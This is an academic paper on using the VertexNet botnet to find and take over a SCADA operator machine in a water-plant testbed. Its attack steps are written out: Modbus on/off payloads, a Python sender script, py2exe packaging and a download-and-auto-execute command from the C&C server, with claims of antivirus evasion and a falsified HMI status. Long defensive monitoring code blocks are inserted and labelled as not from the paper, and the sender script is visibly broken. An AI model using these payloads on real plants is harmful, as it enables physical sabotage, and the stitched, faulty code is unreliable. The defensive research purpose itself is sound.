Industrial Control System Security-Malware Botnet Detection

Albert Sagala*, Rudy Pardosi, Alexander Lumbantobing, Pandapotan Siagian
Faculty of Informatics and Electrical, Del Institute of Technology, Toba Samosir, Indonesia
*[email protected]

Abstract— Industry has realized that SCADA systems were built without considering the security aspect. It was believed that no attacks would reach the SCADA plant using malware such as botnets. Botnets are now the key platform for many Internet attacks, such as spam, distributed denial-of-service (DDoS), identity theft, and phishing. Most current botnet detection approaches work only on specific botnet command and control (C&C) protocols (e.g., IRC) and structures (e.g., centralized), and can become ineffective as botnets change their C&C techniques. In this research, we study a VertexNet malware attack on a SCADA server, showing how it can identify a SCADA Operator machine. The identification is done by analyzing and comparing the process list running on the infected host, so that the attacker does not pick the wrong target, then taking over the SCADA Operator and sending commands to disrupt or operate the plant or machine, and by identifying the functions and activity of the VertexNet botnet. From the experiment conducted, we obtain the result that the VertexNet botnet can identify the SCADA Operator and take over the server, and that its activity can be detected effectively and efficiently.

Keywords— SCADA Security, Botnet, Bot Loader, SCADA Testbed, VertexNet.

I. INTRODUCTION

Hackers and SCADA security professionals can take advantage of an online tool (www.shodanhq.com) that facilitates searching for SCADA plants around the world online. Anticipating this is certainly necessary for all parties: academia, industry and government must work together to prevent and overcome attacks on the vital infrastructure they manage. In our previous research, “SCADA Network Delineation Plant Assessments”, we found that a SCADA network can be sniffed by capturing its communication, which is not secure enough. After that we did further research on secure communication between the HMI and the controller, “Secured Communication Among HMI and Controller using RC-4 Algorithm and Raspberry Pi”, which uses the RC-4 algorithm to encrypt SCADA communication. Considering that attacks are not limited to sniffing and that an attacker will use other attack methods, such as DDoS attacks, we did further research on improving SCADA network security, titled “Improving SCADA Security Using IDS and MikroTik”. The purpose of that research was to integrate an IDS and MikroTik into one defender for the SCADA network.

In an industrial control system, the operator can remotely control a number of plant processes, such as water treatment plants, power plants, nuclear reactors, etc. Remote control is made possible by the communication protocol between the HMI (Human Machine Interface) system and the controller, i.e. the SCADA protocol [3]. The SCADA communication system applies a client-server model over TCP/IP. The client role is played by the controller, while the server role is performed by the operator/engineer with an Engineering Workstation or HMI machine. The SCADA network is designed to be isolated from the corporate network and the Internet.

To analyze botnet activity from network traffic, and to identify and prevent a botnet attack on the SCADA server, we use Wireshark to capture the data traffic coming into and going out of the SCADA Operator. We then use NetworkMiner as an analysis tool to obtain all information about the protocols, functions and malware attack that has infected the server. The topology changes from the previous paper we completed in past months [1]: a C&C Server is added to take over the SCADA Operator and give commands to the SCADA plant. In this research the MikroTik acts as an identifier of the botnet after we determine which ports and functions the botnet’s activity uses.

Organized crime committed by hackers in the cyber world is becoming more sophisticated; statistics show that cyber-attacks are increasing and are more often directed at industrial and government facilities. This increase is of course supported by rapidly developing information technology.

The botmaster and bots (victims) operate over different communication protocols using various topologies: centralized, distributed, hybrid, or randomized. According to their C&C architecture, botnets can be classified as IRC-based, HTTP-based, DNS-based, or peer-to-peer (P2P).

We gratefully thank the Lab Cyber Security Research Centre of Del Institute of Technology for its support in letting us use the SCADA plant, which made this experiment feasible, and the Directorate of Higher Education for financial support under contract number 129/K1.1/LT/2016.

Our contribution in this paper is to show botnet activity through captured botnet traffic and to identify its communication from the victim to the C&C Server. We then improve SCADA security by detecting the botnet activity with SNORT rules customized to the botnet’s functions and protocol. The rest of the paper is organized as follows: Section 2 discusses the related work of our research and the experimental environment. Section 3 explains the network topology of our system in more detail. Section 4 elaborates the results and analysis, and we conclude in Section 5.

II. EXPERIMENTAL

By simulating the malware attack on the SCADA server, we will see how far the botnet can get into the SCADA server, which botnet functions can be detected on the server using traffic capture, and how the botnet can identify the SCADA Operator as the server (target). In this research we use the VertexNet botnet because it is user friendly and has a small package to spread and infect victims. Botnets are a major plague of the Internet [1]. For Internet security, botnets are becoming one of the most serious threats. A botnet is a group of machines infected by malware (bots) under the control of a botmaster. The botmaster commandeers the botnet and organizes it for spying, spreading, attacking or even destruction. There are many methods that can be used to distribute botnets. In our previous work [2], the researchers spread botnets using an email spam technique. There are several bot loaders that can be used to generate botnets and set up a C&C Server. Based on our previous research [2], we can say that VertexNet is the best loader among ten (10) bot loaders, because all basic loader functions are supported. “Supported” means that the loader has the feature and it works well in our test lab.

A. SCADA Botnet Topology

The experiment was conducted on a SCADA-Botnet testbed designed as shown in Figure 1. The attacker commands the C&C Server to control all hosts infected by the botnet. Then the attacker sends the “tasklist” and “netstat -a” commands to identify which host is the SCADA Operator’s control computer. After the attacker finds that computer, the attacker sends the “Download and Auto-Execute” command to the bot on that computer. The bot executes the exploit file to start/stop the SCADA Delineation Plant.

TABLE 1. DEVICES AND IP ADDRESSES

Device Name      IP Address       Operating System   Device Type
SCADA Operator   169.254.213.10   Windows XP         Client
Attacker         169.254.213.222  Kali Linux         Client
C&C Server       169.254.213.101  Ubuntu 10.04       Server
Administrator    169.254.213.5    Security Onion     Sensor
Water Plant      169.254.213.2    PLC Controller     Plant
Router MikroTik  169.254.213.1    RouterOS RB951     Access Point

B. Setup C&C Server
This is the first step of our experimental activity. The best host on which to set up the VertexNet botnet’s C&C Server is one whose task is to run a web server (HTTP protocol) on the default port 80, because the C&C architecture of the VertexNet botnet is HTTP-based.

C. Infection Host
In this research, the researchers use an email spam technique to spread the botnet. In our scenario, the administrator of the SCADA system opens the email, then downloads and executes the botnet file attached to it. In our research, four hosts are infected by the botnet: three (3) hosts are computers on the Workstation Network, and one (1) host is the SCADA Operator’s control computer.

Fig. 1. Topology that is the area of the hacker’s activities for sending commands to the target

Fig. 2. List of Protocols Used by SCADA Operator as Victim

D. Monitoring Victim’s Activity
When all hosts in the network have been infected, the botmaster must find the host that is used as the SCADA Operator’s control computer. The objective is that once that host is controlled by the bot, the botmaster is one step ahead in taking over the SCADA Delineation Plant. The botmaster can use the “tasklist” and “netstat -a” commands to check host activity. The “tasklist” command displays a list of the processes currently running on a local or remote machine. The “netstat -a” command displays protocol statistics and the current TCP/IP network connections.

E. Identifying SCADA Operator as Victim
The difference in currently running processes and connections is what decides whether a host is the SCADA Operator’s control computer or not.

1) Analyze Process List on Victim’s Activity

Fig. 3. Process List Running on Non-SCADA Operator as Victim

The picture above shows the process list of a victim’s machine that has no process belonging to the HMI application program. So a victim’s machine with a task list like that picture is not a SCADA Operator.

Fig. 4. Process List Running on SCADA Operator as Victim

In the two pictures, we can identify the botnet file as “scadabotnet_C&CServer169.”, shown in the red-bordered square, and the SCADA HMI application, shown with the green border. In a real cyber security attack, the attacker will rename the botnet file to an unsuspicious-looking name (such as systemkernel.exe). We named our botnet file as seen in the picture to prove and confirm that our botnet file has infected the host and is still running as a process silently, without a GUI. This picture is also the proof that our botnet has survived and can evade anti-virus detection. In the picture of the running processes on the SCADA Operator’s control computer, as shown in the green-bordered square, there are three new processes running. When the HMI control application is running, the main process is PCIMTASK.exe. That process then calls “Dbsr.exe” and “ALMH.exe”.

2) Analyze Data Traffic for Protocol Using Netstat

Fig. 5. Listening Port and Active Connection on Non-SCADA Operator

The picture above shows that the victim’s machine has the normal listening ports of an everyday office machine; we can see port numbers 135 and 445, which are Windows ports used for command and control on the network (Microsoft RPC protocol) and the Windows Active Directory protocol. So the victim’s machine in the picture is not a SCADA Operator.

Fig. 6. Listening Port and Active Connection with Port Number 502 on SCADA Operator as Victim

The connection used by the botnet to communicate with the C&C Server is the TCP protocol, with Local Address 169.254.213.10:1195 and Foreign Address 169.254.213.101:80 (HTTP), as shown by the red-bordered square. The connection used by the SCADA Operator’s control computer to communicate with the SCADA Delineation Plant is the TCP protocol, with Local Address 169.254.213.10:1178 and Foreign Address 169.254.213.2:502 (Modbus), as shown by the green-bordered square.

3) Analyze Modbus Protocol Segment on Wireshark’s Capture

Using Wireshark and NetworkMiner, we can find the SCADA Operator’s control computer more accurately, as described in this image.

Fig. 7. Wireshark Data Capture Containing the Modbus Functions Read and Write Coil

F. Take over SCADA Operator’s Computer
When the researcher has found the SCADA Operator’s control computer, the next step is to try to locate and remotely control the SCADA Delineation Plant by using exploit files, and the last step is to run the exploit file on the SCADA Operator’s computer, so that an investigator or forensic analyst cannot find evidence of infiltration in the SCADA network, because the exploit file is sent to and executed on the SCADA Operator’s computer.

G. Uploading SCADA Command to Turn On/Off SCADA in Stealth Mode
To begin giving a command to the SCADA plant, the first step is to make a program that sends a payload to the controller. In this research we had to find the payload that the SCADA controller uses to turn the actuator on/off, by capturing it with Wireshark, and we found these hexadecimal strings:

Turn On: \x68\x57\x00\x00\x00\x08\x00\x0f\x00\x63\x00\x01\x01\x01
Turn Off: \x2c\x7e\x00\x00\x00\x08\x00\x0f\x00\x63\x00\x01\x01\x00
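The two payloads above are Modbus/TCP request frames: a 7-byte MBAP header (transaction id 0x6857 or 0x2c7e, protocol id 0, length 8, unit id 0) followed by function code 0x0F (Write Multiple Coils), starting address 0x0063, quantity 1, one data byte and the coil value (0x01 for on, 0x00 for off). Decoding them is also what a defender needs in order to see the write on the wire. The following example is added here and is not code from the paper: it parses Modbus/TCP frames and alerts when a coil or register write reaches the PLC either from a host other than the HMI or from a second Modbus session on the HMI host, which is what the exploit described in this paper produces when it opens its own socket next to the HMI’s existing 169.254.213.10:1178 session. The IP addresses and the two payloads come from the paper; the Read Coils frame, the ephemeral ports and the ModbusWriteMonitor class are assumptions.

```python
import struct
from dataclasses import dataclass

# Function codes from the Modbus application protocol specification.
FUNCTION_NAMES = {
    1: "Read Coils", 2: "Read Discrete Inputs", 3: "Read Holding Registers",
    4: "Read Input Registers", 5: "Write Single Coil", 6: "Write Single Register",
    15: "Write Multiple Coils", 16: "Write Multiple Registers",
}
WRITE_FUNCTIONS = {5, 6, 15, 16}

# Addresses from the paper's Table 1 (HMI / SCADA Operator and the PLC of the water plant).
HMI_IP, PLC_IP = "169.254.213.10", "169.254.213.2"


@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int
    function: int
    start_addr: int
    quantity: int      # coil/register count, or the written value for FC 5 and 6
    data: bytes        # packed values for FC 15 and 16, empty otherwise


def parse_modbus_tcp(payload):
    """Decode the 7-byte MBAP header and the request PDU that follows it."""
    if len(payload) < 8:
        raise ValueError("payload shorter than MBAP header plus function code")
    tid, proto, length, unit = struct.unpack(">HHHB", payload[:7])
    if proto != 0:
        raise ValueError("protocol id %d is not Modbus" % proto)
    if length != len(payload) - 6:          # length counts unit id + PDU
        raise ValueError("MBAP length field does not match the frame size")
    function = payload[7]
    pdu = payload[8:]
    start = quantity = 0
    data = b""
    if function in (1, 2, 3, 4, 5, 6, 15, 16):
        start, quantity = struct.unpack(">HH", pdu[:4])
    if function in (15, 16):
        byte_count = pdu[4]
        data = pdu[5:5 + byte_count]
        if len(data) != byte_count:
            raise ValueError("truncated write data")
    return ModbusFrame(tid, unit, function, start, quantity, data)


class ModbusWriteMonitor:
    """Alerts on writes to the PLC that do not come from the single authorised HMI session."""

    def __init__(self, hmi_ip=HMI_IP, plc_ip=PLC_IP):
        self.hmi_ip = hmi_ip
        self.plc_ip = plc_ip
        self.hmi_session = None   # (src_ip, src_port) of the first HMI -> PLC session seen

    def observe(self, src_ip, src_port, dst_ip, dst_port, payload):
        """Return alert strings for one captured TCP segment; an empty list means benign."""
        if dst_ip != self.plc_ip or dst_port != 502:
            return []
        frame = parse_modbus_tcp(payload)
        session = (src_ip, src_port)
        if src_ip == self.hmi_ip and self.hmi_session is None:
            self.hmi_session = session           # learn the HMI's own polling session
        if frame.function not in WRITE_FUNCTIONS:
            return []
        name = FUNCTION_NAMES.get(frame.function, "FC %d" % frame.function)
        if src_ip != self.hmi_ip:
            return ["%s to coil %d from non-HMI host %s" % (name, frame.start_addr, src_ip)]
        if session != self.hmi_session:
            return ["%s to coil %d from a second Modbus session on the HMI host %s:%d (value %s)"
                    % (name, frame.start_addr, src_ip, src_port, frame.data.hex())]
        return []


# The two request payloads the paper captured with Wireshark.
TURN_ON = b"\x68\x57\x00\x00\x00\x08\x00\x0f\x00\x63\x00\x01\x01\x01"
TURN_OFF = b"\x2c\x7e\x00\x00\x00\x08\x00\x0f\x00\x63\x00\x01\x01\x00"
# Constructed Read Coils poll (FC 1, coil 99, quantity 1) standing in for the HMI's normal traffic.
READ_COILS = b"\x00\x01\x00\x00\x00\x06\x00\x01\x00\x63\x00\x01"


def demo():
    """Replay the scenario: HMI polls and writes, then the exploit and the attacker write."""
    mon = ModbusWriteMonitor()
    poll = mon.observe(HMI_IP, 1178, PLC_IP, 502, READ_COILS)      # HMI session from the paper's netstat capture
    operator = mon.observe(HMI_IP, 1178, PLC_IP, 502, TURN_ON)     # operator action over the same session
    exploit = mon.observe(HMI_IP, 1203, PLC_IP, 502, TURN_OFF)     # exploit's own socket (constructed port)
    attacker = mon.observe("169.254.213.222", 40000, PLC_IP, 502, TURN_OFF)  # direct write from the attacker
    return poll, operator, exploit, attacker


if __name__ == "__main__":
    for alerts in demo():
        print(alerts or "no alert")
```

A source-address allowlist alone would miss the scenario in this paper, because the write originates from the legitimate HMI address; the per-session check is what separates the HMI’s own connection from the exploit’s. The same condition (a second TCP session from the HMI to port 502 carrying a write function code) is the kind of behaviour the SNORT rules mentioned in this paper can be tuned to.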

Those hexadecimal strings are used in a Python program that sends them over a socket to the controller. It is written like this:

    #File Name: SCADAOn.py
    import socket
    import sys
    import binascii

    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect(('169.254.213.2', 502))
    msg = "\x2c\x7e\x00\x00\x00\x08\x00\x0f\x00\x63\x00\x01\x01\x00"

    def kirim(msg):
        msg = sys.argv[1]
        client_socket.send(msg)

The only difference in SCADAOff.py is the hexadecimal text in the ‘msg’ variable: to turn off the SCADA we use the “Turn Off” hexadecimal string that we found.

H. Convert Python to Exe Program
On the victim’s computer, in this case the SCADA Operator’s computer that we found, the operating system is Windows XP. So if we want to upload the program and execute it automatically, we would at least have to install the Python package on the victim. Therefore we must convert the Python program to an exe program that runs natively on Windows. The first step is to download the Python plugin package named “py2exe”. After downloading and installing it, we write one small program to convert the Python file to a Windows exe program:

    from distutils.core import setup
    import py2exe
    setup(console=['SCADAOff.py'])

Compile it at the command prompt, with the following result:

    C:\Users\scyber>python setup.py py2exe
    running py2exe
    *** searching for required modules ***
    *** parsing results ***
    creating python loader for extension 'unicodedata' (C:\Python27\DLLs\unicodedata.pyd -> unicodedata.pyd)

I. Download and Auto Execute SCADA Command
This is the syntax of the ‘Download and Auto-Execute’ command.
Syntax: urldl::@Param1,@Param2,@Param3
Explanation:
@Param1 - the URL of the file to download.
@Param2 - the file path where the downloaded file will be dropped.
@Param3 - whether the botmaster wants to execute the file after download or not {true, false}.

An example of a condition where we can use this command is:
urldl::http://169.254.213.101/upload/exploit/SCADAOff.sfx.exe,c:\\\\SCADAOff.sfx.exe,true

The information we can gather from this command is:
- The botmaster commands the bot on the SCADA Operator’s computer to download the exploit file stored at http://169.254.213.101/upload/exploit/SCADAOff.sfx.exe (C&C Server).
- The exploit file is downloaded on the SCADA Operator’s computer as C:\\SCADAOff.sfx.exe.
- Because the value of @Param3 is true, the botnet auto-executes the file after it is downloaded. The SCADA Operator’s computer is not notified that the download has finished. This exploit file is specially customized to bypass and evade the 56 international anti-virus products on VirusTotal.com.
- While the exploit file executes, there is no GUI, notification, confirmation or result shown on the SCADA Operator’s computer. The impact of the exploit is to start/stop the SCADA Delineation Plant without changing the status of the HMI control application.

III. RESULT AND DISCUSSION

We tested on the environment that we prepared. The HMI can monitor and control the plant. We add the intruder to assess the proposed topology. The phases of our research are described in Figure 8.

Fig. 8. Botnet Phases for Infecting the SCADA System

There are many techniques that an attacker can use to take over the SCADA Delineation Plant. In our research, we use spam mail with a botnet attachment. The attacker sends spam mail to all employees of the targeted company. Then an unaware employee downloads and opens the attachment. The botnet is specially modified to evade 56 international anti-virus products. The infected host reports to the C&C Server and requests tasks to perform. The attacker orders it to search for the SCADA Operator’s control computer.

A. Comparing Status Data Among SCADA Operator – Non Operator
We implemented the botnet infection on 4 separate hosts with different operating systems (Windows XP, Windows 7, Windows 8, Windows 10) and found that the process list and listening ports of a host with one purpose (operator function) differ from those of a host with another purpose (office function). The aspects used to decide whether a machine is a SCADA operator are described in this table:

TABLE 2. PROCESS LIST, LISTENING PORT AND DATA TRAFFIC

No.  SCADA’s Aspect                      Description
1    Process List                        PCIM and HMI application are running on the victim
2    Listening Port & Active Connection  There is an active Modbus protocol connection on port number 502
3    Data Traffic Has Modbus Command     The data traffic captured by Wireshark contains Read and Write Coil, Modbus functions used to give commands to the controller
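Turned around to the defender’s side, the aspects in Table 2 are a baseline for what an HMI host should look like: the HMI processes plus one Modbus session to the PLC, and nothing else. The following example is added here and is not code from the paper: it parses constructed tasklist and netstat -an style output, classifies the host by the Table 2 criteria, and flags any other established connection from an HMI host, such as the 169.254.213.10:1195 to 169.254.213.101:80 C&C session the paper captured, as well as more than one concurrent Modbus session. The process names and IP addresses come from the paper; the sample command output, the PIDs and the triage_host function are assumptions.

```python
import re

# HMI process names reported in the paper (PCIMTASK.exe and the two processes it spawns).
HMI_PROCESSES = {"pcimtask.exe", "dbsr.exe", "almh.exe"}
PLC_IP, MODBUS_PORT = "169.254.213.2", 502   # Water Plant controller from Table 1

# Windows "tasklist" rows: image name (may contain spaces), PID, session name, session#, memory.
TASKLIST_RE = re.compile(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")
# Windows "netstat -an" rows: proto, local addr:port, foreign addr:port, optional state.
NETSTAT_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<faddr>\S+):(?P<fport>\d+|\*)(?:\s+(?P<state>\S+))?\s*$")


def parse_tasklist(text):
    """Return [(image_name, pid), ...]; header and separator rows do not match and are skipped."""
    rows = []
    for line in text.splitlines():
        m = TASKLIST_RE.match(line)
        if m:
            rows.append((m.group("image"), int(m.group("pid"))))
    return rows


def parse_netstat(text):
    """Return one dict per connection row of netstat -an output."""
    conns = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        conns.append({
            "proto": m.group("proto"),
            "laddr": m.group("laddr"), "lport": int(m.group("lport")),
            "faddr": m.group("faddr"),
            "fport": None if m.group("fport") == "*" else int(m.group("fport")),
            "state": m.group("state") or "",
        })
    return conns


def triage_host(tasklist_text, netstat_text):
    """Apply the Table 2 criteria and report sessions an HMI host should not have."""
    images = {img.lower() for img, _ in parse_tasklist(tasklist_text)}
    conns = parse_netstat(netstat_text)
    hmi_procs = sorted(images & HMI_PROCESSES)
    modbus = [c for c in conns
              if c["faddr"] == PLC_IP and c["fport"] == MODBUS_PORT and c["state"] == "ESTABLISHED"]
    is_hmi = bool(hmi_procs) and bool(modbus)
    findings = []
    if is_hmi:
        for c in conns:
            if c["state"] == "ESTABLISHED" and c not in modbus:
                findings.append("HMI host has unexpected session %s:%d -> %s:%d"
                                % (c["laddr"], c["lport"], c["faddr"], c["fport"]))
        if len(modbus) > 1:
            findings.append("HMI host has %d concurrent Modbus sessions to the PLC" % len(modbus))
    return {"is_hmi": is_hmi, "hmi_processes": hmi_procs,
            "modbus_sessions": len(modbus), "findings": findings}


# Constructed sample output in the format of the two Windows commands (not the paper's screenshots).
TASKLIST_HMI = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Console                    0         28 K
PCIMTASK.exe                  1520 Console                    0     12,388 K
Dbsr.exe                      1544 Console                    0      4,120 K
ALMH.exe                      1560 Console                    0      3,904 K
systemkernel.exe              1612 Console                    0      2,816 K
"""
NETSTAT_HMI = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    169.254.213.10:1178    169.254.213.2:502      ESTABLISHED
  TCP    169.254.213.10:1195    169.254.213.101:80     ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""
TASKLIST_OFFICE = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
explorer.exe                  1128 Console                    0     18,204 K
"""
NETSTAT_OFFICE = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
"""

if __name__ == "__main__":
    for label, tl, ns in (("HMI host", TASKLIST_HMI, NETSTAT_HMI),
                          ("office host", TASKLIST_OFFICE, NETSTAT_OFFICE)):
        print(label, triage_host(tl, ns))
```

Run against the office host the check reports nothing; run against the HMI host it confirms the Table 2 criteria and singles out the HTTP session to 169.254.213.101, which an HMI on an isolated plant network has no reason to hold.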

C. Malware Function for Giving Command to the SCADA Controller
On a victim’s machine we try to send the command for downloading our malware, which then runs automatically on the victim’s machine. We succeeded in running the program that contains the “Turn Off” command for the SCADA controller, and the controller was turned off without detection by the anti-virus on the victim’s machine. We can also manipulate the HMI application so that it shows the status of the controller as still running, while in the real field the controller has been shut down by the program that was executed automatically. The HMI application on the SCADA Operator is shown in the picture below:

Fig. 9. HMI Application Showing the Controller Still Running on Its Interface

B. Botnet List Function in Victim’s Machine
The VertexNet botnet has customizable functions that can be executed. There are fourteen (14) commands that can be used by the botmaster to control all bots, as shown in Table 3. The category was ranked based on two priorities: (1) how important the command is and how much impact it has if it works or not; (2) how often the command is used. The more important the command, the more CRITICAL the category, but the more often the command is used, the more LOW the category.

TABLE 3. COMMAND CATEGORY

No  Command                   Syntax        Category
1   Message Box               msg           Low
2   Get Process List          getproc       Low
3   Get Modules List          getmodule     Low
4   Read a file               readfile      Low
5   Visit Web Page            visitpage     Medium
6   (Un) Active Keylogger     setkeylogger  Medium
7   Get Keylogger Logs        getklogs      Medium
8   File Downloader           urldl         Medium
9   Flood Website             httpflood     High
10  Execute Command           exec          High
11  Remote Shell              remoteshell   High
12  Update Loader             update        Critical
13  Terminate Loader Process  close         Critical
14  Uninstall Loader          uninstall     Critical

IV. CONCLUSION

Based on our previous research using botnets [16], there are 14 commands that an attacker can use to command and control their botnets. Every command was categorized by its priority: the more important the command, the higher its category. In this research, we use two commands: the Remote Shell command (running “tasklist” and “netstat -a”) and the Download and Auto Execute command. There are two specific differences between a Non-SCADA Operator and a SCADA Operator: the first is the existence of the HMI control application running on the machine, and the second is the active connection listening on port number 502 (Modbus). The last difference is the traffic that contains the Modbus protocol in its network packets, with read or write coil requests to the SCADA controller (169.254.213.2). Finally, we were able to avoid anti-virus detection and manipulate the HMI status while turning the controller (plant) on/off.

REFERENCES

[1] Keith Stouffer, Joe Falco, Karen Kent. 2006. “Guide to Supervisory Control and Data Acquisition (SCADA) and Industrial Control Systems Security”, National Institute of Standards and Technology (NIST).
[2] C. Patel, Ganesh D. Bhatt, James H. Graham. 2009. “Improving the Cyber Security of SCADA Communication Networks”, Communication, Volume 52, Issue 7, Pages 139-142.
[3] Yang Y. 2013. “Intrusion Detection System for IEC 60870-5-104 based SCADA networks”, IEEE Power and Energy Society General Meeting (PES), Queen’s University.
[4] Zouheir Trabelsi, Walid Ibrahim. 2013. “A Hands-on Approach for Teaching Denial of Service Attacks: A Case Study”, College of Information Technology.
[5] Albert Sagala, Deni Lumbantoruan, Epelin Manurung, Iroma Situmorang, Adi Gunawan. 2015. “Secured Communication Among HMI and Controller Using RC-4 Algorithm and Raspberry Pi”, TELKOMNIKA Indonesian Journal of Electrical Engineering, Vol 15, No 3, IAES.
[6] Rohan Chabukswar, Bruno Sinopoli. 2012. “Simulation of Network Attacks on SCADA Systems”, University of California Berkeley.
[7] Miguel A. Calvo Moya. 2006. “Analysis and Evaluation of the Snort and Bro Network Intrusion Detection Systems”, Universidad Pontificia Comillas.
[8] Eric D. Knapp. 2011. “Industrial Network Security: Securing Critical Infrastructure Networks for Smart Grid, SCADA, and Other Industrial Control Systems”, Syngress Elsevier.
[9] Hahn A., Ashok A., Sridhar S. June 2013. “Cyber-Physical Security Sandboxes: Architecture, Application, and Evaluation for Smart Grid”, IEEE Transactions on Smart Grid, Vol. 4, No. 2.
[10] J. Falco, J. Gilsinn, K. Stouffer. 2004. “IT Security for Industrial Control Systems: Requirements Specification and Performance Testing”, 2004 NDIA Homeland Security Symposium & Exhibition, Crystal City, VA.
[11] Lemay A., Fernandez J., Knight S. 2013. “An isolated virtual cluster for SCADA network security research”, Proceedings of the 1st International Symposium for ICS & SCADA Cyber Security Research.
[12] R. R. R. Barbosa, R. Sadre, A. Pras. 2012. “A First Look into SCADA Network Traffic”, IEEE/IFIP Network Operations and Management Symposium (NOMS 2012), Volume 17, page 6, Springer.
[13] Steven Cheung, et al. 2006. “Using Model-based Intrusion Detection for SCADA Networks”, SRI International, Computer Science Laboratory.
[14] Giani A., Sastry S., Karl H. Johansson, Sandberg H. 2012. “The VIKING Project: An Initiative on Resilient Control of Power Networks”, KTH University, Sweden.
[15] B. Dutertre. October 2006. “Formal modeling and analysis of the Modbus protocol”, Technical report, Computer Science Laboratory, SRI International.
[16] Sagala A., Lumbantobing A. 2016. “Design an advanced botnet to monitor user awareness on harmful malware using VertexNet”, Internetworking Indonesia Journal.